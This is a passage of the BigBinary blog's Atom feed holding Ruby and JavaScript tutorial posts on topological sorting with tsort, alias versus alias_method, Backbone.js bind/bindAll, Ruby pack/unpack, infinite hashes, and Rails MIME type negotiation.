Project.newp.add_requirement(:r2, :r11)p.add_requirement(:r8, :r3, :r7)p.add_requirement(:r9, :r8, :r11)p.add_requirement(:r10, :r3, :r11)p.add_requirement(:r11, :r7, :r5)puts p.tsort</code></pre><p>If I execute above code in <code>ruby 1.9.2</code> I get following result.</p><pre><code class="language-plaintext">r7r5r11r2r3r8r9r10</code></pre><p>So that is the order in which tasks should be executed .</p><h2>How Tsort works</h2><p><code>tsort</code> requires that following two methods must be implemented.</p><p><code>#tsort_each_node</code> - as the name suggests it is used to iterate over all thenodes in the graph. In the above example all the requirements are stored as ahash key . So to iterate over all the nodes we need to go through all the hashkeys. And that can be done using <code>#each_key</code> method of hash.</p><p><code>#tsort_each_child</code> - this method is used to iterate over all the child nodesfor the given node. Since this is directed acyclic graph all the child nodes arethe dependencies. We stored all the dependencies of a project as an array. So toget the list of all the dependencies for a node all we need to do is<code>@requirements[name].each</code>.</p><h2>Another example</h2><p>To make things clearer lets try to solve the same problem in a different way.</p><pre><code class="language-ruby">require &quot;tsort&quot;class Project  attr_accessor :dependents, :name  def initialize(name)    @name = name    @dependents = []  endendclass Sorter  include TSort  def initialize(col)    @col = col  end  def tsort_each_node(&amp;block)    @col.each(&amp;block)  end  def tsort_each_child(project, &amp;block)    @col.select { |i| i.name == project.name }.first.dependents.each(&amp;block)  endendr2  = Project.new :r2r3  = Project.new :r3r5  = Project.new :r5r7  = Project.new :r7r8  = Project.new :r8r9  = Project.new :r9r10 = Project.new :r10r11 = Project.new :r11r2.dependents &lt;&lt; r11r8.dependents &lt;&lt; r3r8.dependents &lt;&lt; r7r9.dependents &lt;&lt; r8r9.dependents &lt;&lt; r11r10.dependents &lt;&lt; r3r10.dependents &lt;&lt; r11r11.dependents &lt;&lt; r7r11.dependents &lt;&lt; r5col = [r2, r3, r5, r7, r8, r9, r10, r11]result = Sorter.new(col).tsortputs result.map(&amp;:name).inspect</code></pre><p>When I execute the above code this is the result I get</p><pre><code class="language-plaintext">[:r7, :r5, :r11, :r2, :r3, :r8, :r9, :r10]</code></pre><p>If you look at the code here I am doing exactly the same thing as in the firstcase.</p><h2>Using before and after option</h2><p>Let's try to solve the same problem one last time using <code>before</code> and <code>after</code>option. Here is the code.</p><pre><code class="language-ruby">require &quot;tsort&quot;class Project  attr_accessor :before, :after, :name  def initialize(name, options = {})    @name = name    @before, @after = options[:before], options[:after]  endendclass Sorter  include TSort  def initialize(col)    @col = col  end  def tsort_each_node(&amp;block)    @col.each(&amp;block)  end  def tsort_each_child(project, &amp;block)    @col.select { |i| i.before == project.name || i.name == project.after }.each(&amp;block)  endendr2  = Project.new :r2, after: :r11r3  = Project.new :r3, before: :r8r5  = Project.new :r5, before: :r11r7  = Project.new :r7, before: :r11r8  = Project.new :r8, after: :r7, before: :r9r9  = Project.new :r9, after: :r11r10 = Project.new :r10, after: :r3r11 = Project.new :r11, before: :r10col = [r5, r2, r11, r3, r10, r9, r7, r8, r5]result = Sorter.new(col).tsortputs result.map(&amp;:name).inspect</code></pre><p>Here is the result.</p><pre><code class="language-ruby">[:r5, :r7, :r11, :r2, :r3, :r10, :r8, :r9]</code></pre><h2>Sorting of rails initializer</h2><p>If you have written a rails plugin then you can use code like this</p><pre><code class="language-ruby">initializer 'my_plugin_initializer',after: 'to_prepare', before: 'before_eager_load' do |app| ....end</code></pre><p>The way rails figures out the exact order in which initializer should beexecuted is exactly same as I illustrated above. Here is the code from rails.</p><pre><code class="language-ruby">alias :tsort_each_node :eachdef tsort_each_child(initializer, &amp;block)  select { |i| i.before == initializer.name || i.name == initializer.after }.each(&amp;block)end........................initializers.tsort.each do |initializer|  initializer.run(*args) if initializer.belongs_to?(group)end</code></pre><p>When Rails boots it invokes a lot of initializers. Rails uses tsort to get theorder in which initializers should be invoked.<a href="https://gist.github.com/2051633">Here is the list</a> of unsorted initializers.After sorting the initializers list is <a href="https://gist.github.com/2051649">this</a> .</p><h2>Where else it is used</h2><p><a href="http://gembundler.com/">Bundler</a> uses tsort to find the order in which gemsshould be installed.</p><p>Tsort can also be used to statically analyze programming code by looking atmethod dependency graph.</p><p>Image source:<a href="http://en.wikipedia.org/wiki/Directed_acyclic_graph">http://en.wikipedia.org/wiki/Directed_acyclic_graph</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[alias vs alias_method]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/alias-vs-alias-method"/>
      <updated>2012-01-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/alias-vs-alias-method</id>
      <content type="html"><![CDATA[<p>It comes up very often. Should I use <code>alias</code> or <code>alias_method</code> . Let's take alook at them in a bit detail.</p><h2>Usage of alias</h2><pre><code class="language-ruby">class User  def full_name    puts &quot;Johnnie Walker&quot;  end  alias name full_nameendUser.new.name #=&gt;Johnnie Walker</code></pre><h2>Usage of alias_method</h2><pre><code class="language-ruby">class User  def full_name    puts &quot;Johnnie Walker&quot;  end  alias_method :name, :full_nameendUser.new.name #=&gt;Johnnie Walker</code></pre><p>First difference you will notice is that in case of <code>alias_method</code> we need touse a comma between the &quot;new method name&quot; and &quot;old method name&quot;.</p><p><code>alias_method</code> takes both symbols and strings as input. Following code wouldalso work.</p><pre><code class="language-ruby">alias_method 'name', 'full_name'</code></pre><p>That was easy. Now let's take a look at how scoping impacts usage of <code>alias</code> and<code>alias_method</code> .</p><h2>Scoping with alias</h2><pre><code class="language-ruby">class User  def full_name    puts &quot;Johnnie Walker&quot;  end  def self.add_rename    alias_method :name, :full_name  endendclass Developer &lt; User  def full_name    puts &quot;Geeky geek&quot;  end  add_renameendDeveloper.new.name #=&gt; 'Gekky geek'</code></pre><p>In the above case method &quot;name&quot; picks the method &quot;full_name&quot; defined in&quot;Developer&quot; class. Now let's try with <code>alias</code>.</p><pre><code class="language-ruby">class User  def full_name    puts &quot;Johnnie Walker&quot;  end  def self.add_rename    alias :name :full_name  endendclass Developer &lt; User  def full_name    puts &quot;Geeky geek&quot;  end  add_renameendDeveloper.new.name #=&gt; 'Johnnie Walker'</code></pre><p>With the usage of <code>alias</code> the method &quot;name&quot; is not able to pick the method&quot;full_name&quot; defined in <code>Developer</code>.</p><p>This is because <code>alias</code> is a keyword and it is lexically scoped. It means ittreats <code>self</code> as the value of <code>self</code> at the time the source code was read . Incontrast <code>alias_method</code> treats <code>self</code> as the value determined at the run time.</p><p>Overall my recommendation would be to use <code>alias_method</code>. Since <code>alias_method</code>is a method defined in class <code>Module</code> it can be overridden later and it offersmore flexibility.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding bind and bindAll in Backbone.js]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-bind-and-bindall-in-backbone"/>
      <updated>2011-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-bind-and-bindall-in-backbone</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/jashkenas/backbone/">Backbone.js</a> users use<a href="https://underscorejs.org/#bind">bind</a> and<a href="https://underscorejs.org/#bindAll">bindAll</a> methods provide by<a href="https://github.com/jashkenas/underscore">underscore.js</a> a lot. In this blog Iam going to discuss why these methods are needed and how it all works.</p><h2>It all starts with apply</h2><p>Function <code>bindAll</code> internally uses <code>bind</code> . And <code>bind</code> internally uses <code>apply</code>.So it is important to understand what <code>apply</code> does.</p><pre><code class="language-javascript">var func = function beautiful() {  alert(this + &quot; is beautiful&quot;);};func();</code></pre><p>If I execute above code then I get <code>[object window] is beautiful</code>. I am gettingthat message because when function is invoked then <code>this</code> is <code>window</code>, thedefault global object.</p><p>In order to change the value of <code>this</code> we can make use of method <code>apply</code> asgiven below.</p><pre><code class="language-javascript">var func = function beautiful() {  alert(this + &quot; is beautiful&quot;);};func.apply(&quot;Internet&quot;);</code></pre><p>In the above case the alert message will be <code>Internet is beautiful</code> . Similarlyfollowing code will produce <code>Beach is beautiful</code> .</p><pre><code class="language-javascript">var func = function beautiful() {  alert(this + &quot; is beautiful&quot;);};func.apply(&quot;Beach&quot;); //Beach is beautiful</code></pre><p>In short, <code>apply</code> lets us control the value of <code>this</code> when the function isinvoked.</p><h2>Why bind is needed</h2><p>In order to understand why <code>bind</code> method is needed first let's look at followingexample.</p><pre><code class="language-javascript">function Developer(skill) {  this.skill = skill;  this.says = function () {    alert(this.skill + &quot; rocks!&quot;);  };}var john = new Developer(&quot;Ruby&quot;);john.says(); //Ruby rocks!</code></pre><p>Above example is pretty straight forward. <code>john</code> is an instance of <code>Developer</code>and when <code>says</code> function is invoked then we get the right alert message.</p><p>Notice that when we invoked <code>says</code> we invoked like this <code>john.says()</code>. If wejust want to get hold of the function that is returned by <code>says</code> then we need todo <code>john.says</code>. So the above code could be broken down to following code.</p><pre><code class="language-javascript">function Developer(skill) {  this.skill = skill;  this.says = function () {    alert(this.skill + &quot; rocks!&quot;);  };}var john = new Developer(&quot;Ruby&quot;);var func = john.says;func(); // undefined rocks!</code></pre><p>Above code is similar to the code above it. All we have done is to store thefunction in a variable called <code>func</code>. If we invoke this function then we shouldget the alert message we expected. However if we run this code then the alertmessage will be <code>undefined rocks!</code>.</p><p>We are getting <code>undefined rocks!</code> because in this case <code>func</code> is being invokedin the global context. <code>this</code> is pointing to global object called <code>window</code> whenthe function is executed. And <code>window</code> does not have any attribute called<code>skill</code> . Hence the output of <code>this.skill</code> is <code>undefined</code>.</p><p>Earlier we saw that using <code>apply</code> we can fix the problem arising out of <code>this</code>.So lets try to use <code>apply</code> to fix it.</p><pre><code class="language-javascript">function Developer(skill) {  this.skill = skill;  this.says = function () {    alert(this.skill + &quot; rocks!&quot;);  };}var john = new Developer(&quot;Ruby&quot;);var func = john.says;func.apply(john);</code></pre><p>Above code fixes our problem. This time the alert message we got was<code>Ruby rocks!</code>. However there is an issue and it is a big one.</p><p>In JavaScript world functions are first class citizens. The reason why we createfunction is so that we can easily pass it around. In the above case we created afunction called <code>func</code>. However along with the function <code>func</code> now we need tokeep passing <code>john</code> around. That is not a good thing. Secondly theresponsibility of rightly invoking this function has been shifted from thefunction creator to the function consumer. That's not a good API.</p><p>We should try to create functions which can easily be called by the consumers ofthe function. This is where <code>bind</code> comes in.</p><h2>How bind solves the problem</h2><p>First lets see how using <code>bind</code> solves the problem.</p><pre><code class="language-javascript">function Developer(skill) {  this.skill = skill;  this.says = function () {    alert(this.skill + &quot; rocks!&quot;);  };}var john = new Developer(&quot;Ruby&quot;);var func = _.bind(john.says, john);func(); // Ruby rocks!</code></pre><p>To solve the problem regarding <code>this</code> issue we need a function that is alreadymapped to <code>john</code> so that we do not need to keep carrying <code>john</code> around. That'sprecisely what <code>bind</code> does. It returns a new function and this new function has<code>this</code> bound to the value that we provide.</p><p>Here is a snippet of code from <code>bind</code> method</p><pre><code class="language-javascript">return function () {  return func.apply(obj, args.concat(slice.call(arguments)));};</code></pre><p>As you can see <code>bind</code> internally uses <code>apply</code> to set <code>this</code> to the secondparameter we passed while invoking <code>bind</code>.</p><p>Notice that <code>bind</code> does not change existing function. It returns a new functionand that new function should be used.</p><h2>How bindAll solves the problem</h2><p>Instead of <code>bind</code> we can also use <code>bindAll</code> . Here is solution with <code>bindAll</code>.</p><pre><code class="language-javascript">function Developer(skill) {  this.skill = skill;  this.says = function () {    alert(this.skill + &quot; rocks!&quot;);  };}var john = new Developer(&quot;Ruby&quot;);_.bindAll(john, &quot;says&quot;);var func = john.says;func(); //Ruby rocks!</code></pre><p>Above code is similar to <code>bind</code> solution but there are some big differences.</p><p>The first big difference is that we do not have to worry about the returnedvalue of <code>bindAll</code> . In case of <code>bind</code> we must use the returned function. In<code>bindAll</code> we do not have to worry about the returned value but it comes with aprice. <code>bindAll</code> actually mutates the function. What does that mean.</p><p>See <code>john</code> object has an attribute called <code>says</code> which returns a function .<code>bindAll</code> goes and changes the attribute <code>says</code> so that when it returns afunction, that function is already bound to <code>john</code>.</p><p>Here is a snippet of code from <code>bindAll</code> method.</p><pre><code class="language-javascript">function(f) { obj[f] = _.bind(obj[f], obj); }</code></pre><p>Notice that <code>bindAll</code> internally calls <code>bind</code> and it overrides the existingattribute with the function returned by <code>bind</code>.</p><p>The other difference between <code>bind</code> and <code>bindAll</code> is that in <code>bind</code> firstparameter is a function <code>john.says</code> and the second parameter is the value ofthis <code>john</code>. In <code>bindAll</code> first parameter is value of this <code>john</code> and the secondparameter is not a function but the attribute name.</p><h2>Things to watch out for</h2><p>While developing a Backbone.js application someone had code like this</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({  initialize: function () {    _.bind(this.render, this);    this.model.bind(&quot;change&quot;, this.render);  },});</code></pre><p>Above code will not work because the returned value of <code>bind</code> is not being used.The correct usage will be</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({  initialize: function () {    this.model.bind(&quot;change&quot;, _.bind(this.render, this));  },});</code></pre><p>Or you can use <code>bindAll</code> as given below.</p><pre><code class="language-javascript">window.ProductView = Backbone.View.extend({  initialize: function () {    _.bindAll(this, this.render);    this.model.bind(&quot;change&quot;, this.render);  },});</code></pre><h2>Recommended videos</h2><p>If you like this blog then most likely you will also like our videos series on&quot;Understanding this in JavaScript&quot; at<a href="https://www.bigbinary.com/videos/learn-javascript">Learn JavaScript</a> .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby pack unpack]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-pack-unpack"/>
      <updated>2011-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-pack-unpack</id>
      <content type="html"><![CDATA[<p>C programming language allows developers to directly access the memory wherevariables are stored. Ruby does not allow that. There are times while working inRuby when you need to access the underlying bits and bytes. Ruby provides twomethods <code>pack</code> and <code>unpack</code> for that.</p><p>Here is an example.</p><pre><code class="language-ruby">&gt; 'A'.unpack('b*')=&gt; [&quot;10000010&quot;]</code></pre><p>In the above case 'A' is a string which is being stored and using <code>unpack</code> I amtrying to read the bit value. The <a href="http://www.asciitable.com">ASCII table</a> saysthat ASCII value of 'A' is 65 and the binary representation of 65 is <code>10000010</code>.</p><p>Here is another example.</p><pre><code class="language-ruby">&gt; 'A'.unpack('B*')=&gt; [&quot;01000001&quot;]</code></pre><p>Notice the difference in result from the first case. What's the differencebetween <code>b*</code> and <code>B*</code>. In order to understand the difference first lets discussMSB and LSB.</p><h2>Most significant bit vs Least significant bit</h2><p>All bits are not created equal. <code>C</code> has ascii value of 67. The binary value of67 is <code>1000011</code>.</p><p>First let's discuss MSB (most significant bit) style . If you are following MSBstyle then going from left to right (and you always go from left to right) thenthe most significant bit will come first. Because the most significant bit comesfirst we can pad an additional zero to the left to make the number of bitseight. After adding an additional zero to the left the binary value looks like<code>01000011</code>.</p><p>If we want to convert this value in the LSB (Least Significant Bit) style thenwe need to store the least significant bit first going from left to right. Givenbelow is how the bits will be moved if we are converting from MSB to LSB. Notethat in the below case position 1 is being referred to the leftmost bit.</p><pre><code>move value 1 from position 8 of MSB to position 1 of LSBmove value 1 from position 7 of MSB to position 2 of LSBmove value 0 from position 6 of MSB to position 3 of LSBand so on and so forth</code></pre><p>After the exercise is over the value will look like <code>11000010</code>.</p><p>We did this exercise manually to understand the difference between<code>most significant bit</code> and <code>least significant bit</code>. However unpack method candirectly give the result in both MSB and LSB. The <code>unpack</code> method can take both<code>b*</code> and <code>B*</code> as the input. As per the ruby documentation here is thedifference.</p><pre><code>B | bit string (MSB first)b | bit string (LSB first)</code></pre><p>Now let's take a look at two examples.</p><pre><code class="language-ruby">&gt; 'C'.unpack('b*')=&gt; [&quot;11000010&quot;]&gt; 'C'.unpack('B*')=&gt; [&quot;01000011&quot;]</code></pre><p>Both <code>b*</code> and <code>B*</code> are looking at the same underlying data. It's just that theyrepresent the data differently.</p><h2>Different ways of getting the same data</h2><p>Let's say that I want binary value for string <code>hello</code> . Based on the discussionin the last section that should be easy now.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('B*')=&gt; [&quot;0110100001100101011011000110110001101111&quot;]</code></pre><p>The same information can also be derived as</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*').map {|e| e.to_s 2}=&gt; [&quot;1101000&quot;, &quot;1100101&quot;, &quot;1101100&quot;, &quot;1101100&quot;, &quot;1101111&quot;]</code></pre><p>Let's break down the previous statement in small steps.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*')=&gt; [104, 101, 108, 108, 111]</code></pre><p>Directive <code>C*</code> gives the <code>8-bit unsigned integer</code> value of the character. Notethat ascii value of <code>h</code> is <code>104</code>, ascii value of <code>e</code> is <code>101</code> and so on.</p><p>Using the technique discussed above I can find hex value of the string.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*').map {|e| e.to_s 16}=&gt; [&quot;68&quot;, &quot;65&quot;, &quot;6c&quot;, &quot;6c&quot;, &quot;6f&quot;]</code></pre><p>Hex value can also be achieved directly.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('H*')=&gt; [&quot;68656c6c6f&quot;]</code></pre><h2>High nibble first vs Low nibble first</h2><p>Notice the difference in the below two cases.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('H*')=&gt; [&quot;68656c6c6f&quot;]&gt; &quot;hello&quot;.unpack('h*')=&gt; [&quot;8656c6c6f6&quot;]</code></pre><p>As per ruby documentation for unpack</p><pre><code>H | hex string (high nibble first) h | hex string (low nibble first)</code></pre><p>A byte consists of 8 bits. A nibble consists of 4 bits. So a byte has twonibbles. The ascii value of 'h' is <code>104</code>. Hex value of 104 is <code>68</code>. This <code>68</code> isstored in two nibbles. First nibble, meaning 4 bits, contain the value <code>6</code> andthe second nibble contains the value <code>8</code>. In general we deal with high nibblefirst and going from left to right we pick the value <code>6</code> and then <code>8</code>.</p><p>However if you are dealing with low nibble first then low nibble value <code>8</code> willtake the first slot and then <code>6</code> will come. Hence the result in &quot;low nibblefirst&quot; mode will be <code>86</code>.</p><p>This pattern is repeated for each byte. And because of that a hex value of<code>68 65 6c 6c 6f</code> looks like <code>86 56 c6 c6 f6</code> in low nibble first format.</p><h2>Mix and match directives</h2><p>In all the previous examples I used <code>*</code>. And a <code>*</code> means to keep going as longas it has to keep going. Lets see a few examples.</p><p>A single <code>C</code> will get a single byte.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C')=&gt; [104]</code></pre><p>You can add more <code>Cs</code> if you like.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('CC')=&gt; [104, 101]&gt; &quot;hello&quot;.unpack('CCC')=&gt; [104, 101, 108]&gt; &quot;hello&quot;.unpack('CCCCC')=&gt; [104, 101, 108, 108, 111]</code></pre><p>Rather than repeating all those directives, I can put a number to denote howmany times you want previous directive to be repeated.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C5')=&gt; [104, 101, 108, 108, 111]</code></pre><p>I can use <code>*</code> to capture al the remaining bytes.</p><pre><code class="language-ruby">&gt; &quot;hello&quot;.unpack('C*')=&gt; [104, 101, 108, 108, 111]</code></pre><p>Below is an example where <code>MSB</code> and <code>LSB</code> are being mixed.</p><pre><code class="language-ruby">&gt; &quot;aa&quot;.unpack('b8B8')=&gt; [&quot;10000110&quot;, &quot;01100001&quot;]</code></pre><h3>pack is reverse of unpack</h3><p>Method <code>pack</code> is used to read the stored data. Let's discuss a few examples.</p><pre><code class="language-ruby">&gt;  [1000001].pack('C')=&gt; &quot;A&quot;</code></pre><p>In the above case the binary value is being interpreted as<code>8 bit unsigned integer</code> and the result is 'A'.</p><pre><code class="language-ruby">&gt; ['A'].pack('H')=&gt; &quot;\xA0&quot;</code></pre><p>In the above case the input 'A' is not ASCII 'A' but the hex 'A'. Why is it hex'A'. It is hex 'A' because the directive 'H' is telling pack to treat inputvalue as hex value. Since 'H' is high nibble first and since the input has onlyone nibble then that means the second nibble is zero. So the input changes from<code>['A']</code> to <code>['A0']</code> .</p><p>Since hex value <code>A0</code> does not translate into anything in the ASCII table thefinal output is left as it and hence the result is <code>\xA0</code>. The leading <code>\x</code>indicates that the value is hex value.</p><p>Notice the in hex notation <code>A</code> is same as <code>a</code>. So in the above example I canreplace <code>A</code> with <code>a</code> and the result should not change. Let's try that.</p><pre><code class="language-ruby">&gt; ['a'].pack('H')=&gt; &quot;\xA0&quot;</code></pre><p>Let's discuss another example.</p><pre><code class="language-ruby">&gt; ['a'].pack('h')=&gt; &quot;\n&quot;</code></pre><p>In the above example notice the change. I changed directive from <code>H</code> to <code>h</code>.Since <code>h</code> means low nibble first and since the input has only one nibble thevalue of low nibble becomes zero and the input value is treated as high nibblevalue. That means value changes from <code>['a']</code> to <code>['0a']</code>. And the output will be<code>\x0A</code>. If you look at ASCII table then hex value <code>A</code> is ASCII value 10 which is<code>NL line feed, new line</code>. Hence we see <code>\n</code> as the output because it represents&quot;new line feed&quot;.</p><h2>Usage of unpack in Rails source code</h2><p>I did a quick grep in Rails source code and found following usage of unpack.</p><pre><code>email_address_obfuscated.unpack('C*')'mailto:'.unpack('C*')email_address.unpack('C*')char.unpack('H2')column.class.string_to_binary(value).unpack(&quot;H*&quot;)data.unpack(&quot;m&quot;)s.unpack(&quot;U\*&quot;)</code></pre><p>Already we have seen the usage of directive <code>C*</code> and <code>H</code> for unpack. Thedirective <code>m</code> gives the base64 encoded value and the directive <code>U*</code> gives theUTF-8 character. Here is an example.</p><pre><code class="language-ruby">&gt; &quot;Hello&quot;.unpack('U*')=&gt; [72, 101, 108, 108, 111]</code></pre><h2>Testing environment</h2><p>Above code was tested with ruby 1.9.2 .</p><p>French version of this article is available<a href="http://vfsvp.fr/article/les-methodes-pack-et-unpack-en-ruby/">here</a> .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Infinite hash and default_proc]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/default_proc_in_infinite_hash"/>
      <updated>2010-12-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/default_proc_in_infinite_hash</id>
      <content type="html"><![CDATA[<p>I you already know how<a href="http://twitter.com/#!/tenderlove/status/5687291469107200">this infinite hash</a>works then you are all set. If not read along.</p><h2>Default value of Hash</h2><p>If I want a hash to have a default value then that's easy.</p><pre><code class="language-ruby">h = Hash.new(0)puts h['usa'] #=&gt; 0</code></pre><p>Above code will give me a fixed value if key is not found. If I want dynamicvalue then I can use block form.</p><pre><code class="language-ruby">h = Hash.new{|h,k| h[k] = k.upcase}puts h['usa'] #=&gt; USAputs h['india'] #=&gt; INDIA</code></pre><h2>Default value is hash</h2><p>If I want the default value to be a <code>hash</code> then it seems easy but it falls apartsoon.</p><pre><code class="language-ruby">h = Hash.new{|h,k| h[k] = {} }puts h['usa'].inspect #=&gt; {}puts h['usa']['ny'].inspect #=&gt; nilputs h['usa']['ny']['nyc'].inspect #=&gt; NoMethodError: undefined method `[]' for nil:NilClass</code></pre><p>In the above if a key is missing for <code>h</code> then it returns a hash. However thatreturned hash is an ordinary hash which does not have a capability of returninganother hash if a key is missing.</p><p>This is where <code>default_proc</code> comes into picture.<a href="http://ruby-doc.org/core-1.8.6/classes/Hash.html#M002854">hash.default_proc</a>returns the block which was passed to <code>Hash.new</code> .</p><pre><code class="language-ruby">h = Hash.new{|h,k| Hash.new(&amp;h.default_proc)}puts h['usa']['ny']['nyc'].inspect #=&gt; {}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Mime type resolution in Rails]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/mime-type-resolution-in-rails"/>
      <updated>2010-11-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mime-type-resolution-in-rails</id>
      <content type="html"><![CDATA[<p>This is a long blog. If you want a summary then Jos Valim has provided a<a href="http://twitter.com/#!/josevalim/status/7928782685995009">summary in less than 140 characters</a>.</p><p>It is common to see following code in Rails</p><pre><code class="language-ruby">respond_to do |format|  format.html  format.xml  { render :xml =&gt; @users }end</code></pre><p>If you want output in xml format then request with <code>.xml</code> extension at the endlike this <code>localhost:3000/users.xml</code> and you will get the output in xml format.</p><p>What we saw is only one part of the puzzle. The other side of the equation isHTTP header field<a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.1">Accept</a> definedin HTTP RFC.</p><h2>HTTP Header Field Accept</h2><p>When browser sends a request then it also sends the information about what kindof resources the browser is capable of handling. Here are some of the examplesof the <em>Accept</em> header a browser can send.</p><pre><code class="language-plaintext">text/plainimage/gif, images/x-xbitmap, images/jpeg, application/vnd.ms-excel, application/msword,application/vnd.ms-powerpoint, */*text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8application/vnd.wap.wmlscriptc, text/vnd.wap.wml, application/vnd.wap.xhtml+xml,application/xhtml+xml, text/html, multipart/mixed, */*</code></pre><p>If you are reading this blog on a browser then you can find out what kind of<em>Accept</em> header your browser is sending by visiting<a href="http://pgl.yoyo.org/http/browser-headers.php">this link</a>. Here is list of<em>Accept</em> header sent by different browsers on my machine.</p><pre><code class="language-plaintext">Chrome: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Firefox: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,application/jsonSafari: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5IE: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif,image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*</code></pre><p>Let's take a look at the <em>Accept</em> header sent by Safari.</p><pre><code class="language-plaintext">Safari: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5</code></pre><p>Safari is saying that I can handle documents which are xml (application/xml),html (text/html) or plain text (text/plain) documents. And I can handle imagessuch as image/png. If all else fails then send me whatever you can and I willtry to render that document to the best of my ability.</p><p>Notice that there are also <strong>q</strong> values. That signifies the priority order. Thisis what HTTP spec has to say about <strong>q</strong>.</p><blockquote><p>Each media-range MAY be followed by one or more accept-params, beginning withthe &quot;q&quot; parameter for indicating a relative quality factor. The first &quot;q&quot;parameter (if any) separates the media-range parameter(s) from theaccept-params. Quality factors allow the user or user agent to indicate therelative degree of preference for that media-range, using the qvalue scalefrom 0 to 1 (section 3.9). The default value is q=1.</p></blockquote><p>The spec is saying is that each document type has a default value of <em>q</em> as 1.When <em>q</em> value is specified then take that value into account. For all documentsthat have same <em>q</em> value give high priority to the one that came first in thelist. Based on that this should be the order in which documents should be sentto safari browser.</p><pre><code class="language-plaintext">application/xml (q is 1)application/xhtml+xml (q is 1)image/png (q is 1)text/html (q is 0.9)text/plain (q is 0.8)\*/\* (q is 0.5)</code></pre><p>Notice that Safari is nice enough to put a lower priority for */*. Chrome andFirefox also puts */* at a lower priority which is a good thing. Not so withIE which does not declare any q value for */* .</p><p>Look at the order again and you can see that <em>application/xml</em> has higherpriority over <em>text/html</em>. What it means is that safari is telling Rails that Iwould prefer <em>application/xml</em> over <em>text/html</em>. Send me <em>text/html</em> only if youcannot send <em>application/xml</em>.</p><p>And let's say that you have developed a RESTful app which is capable of sendingoutput in both html and xml formats.</p><p>Rails being a good HTTP citizen should follow the HTTP_ACCEPT protocol andshould send an xml document in this case. Again all you did was visit a websiteand safari is telling rails that send me xml document over html document.Clearly HTTP_ACCEPT values being sent by Safari is broken.</p><h2>HTTP_ACCEPT is broken</h2><p>HTTP<em>ACCEPT attribute concept is neat. It defines the order and the priority.However the implementation is broken by all the browser vendors. Given the casethat browsers do not send proper HTTP_ACCEPT what can rails do. One solution isto ignore it completely. If you want _xml</em> output then request<em>http://localhost:3000/users.xml</em> . Solely relying on formats make life easy andless buggy. This is what Rails did for a long time.</p><p>Starting<a href="https://github.com/rails/rails/commit/2f4aaed7b3feb3be787a316fab3144c06bb21a27">this commit</a>,by default, rails did ignore HTTP_ACCEPT attribute. Same is true for<a href="https://developer.twitter.com/en/docs">Twitter API</a> where HTTP_ACCEPT attributeis ignored and twitter solely relies on format to find out what kind of documentshould be returned.</p><p>Unfortunately this solution has its own sets of problems. Web has been there fora long time and there are a lot of applications who expect the response type tobe RSS feed if they are sending <em>application/rss+xml</em> in their HTTP*ACCEPTattribute. It is not nice to take a hard stand and ask all of them to requestwith extension *.rss_ .</p><h3>Parsing HTTP_ACCEPT attribute</h3><p>Parsing and obeying HTTP_ACCEPT attribute is filled with many edge cases. Firstlet's look at the code that decides what to parse and how to handle the data.</p><pre><code class="language-ruby">BROWSER_LIKE_ACCEPTS = /,\s*\*\/\*|\*\/\*\s*,/def formats  accept = @env['HTTP_ACCEPT']  @env[&quot;action_dispatch.request.formats&quot;] ||=    if parameters[:format]      Array(Mime[parameters[:format]])    elsif xhr? || (accept &amp;&amp; accept !~ BROWSER_LIKE_ACCEPTS)      accepts    else      [Mime::HTML]    endend</code></pre><p>Notice that if a format is passed like <em>http://localhost:3000/users.xml</em> or<em>http://localhost:3000/users.js</em> then Rails does not even parse the HTTP_ACCEPTvalues. Also note that if browser is sending */* along with other values thenRails totally bails out and just returns Mime::HTML unless the request is ajaxrequest.</p><p>Next I am going to discuss some of the cases in greater detail which shouldbring more clarity around this issue.</p><h2>Case 1: HTTP_ACCEPT is */*</h2><p>I have following code.</p><pre><code class="language-ruby">respond_to do |format|  format.html { render :text =&gt; 'this is html' }  format.js  { render :text =&gt; 'this is js' }end</code></pre><p>I am assuming that <em>HTTP_ACCEPT</em> value is */* . In this case browser is sayingthat send me whatever you got. Since browser is not dictating the order in whichdocuments should be sent Rails will look at the order in which Mime types aredeclared in respond_to block and will pick the first one. Here is thecorresponding code</p><pre><code class="language-ruby">def negotiate_mime(order)  formats.each do |priority|    if priority == 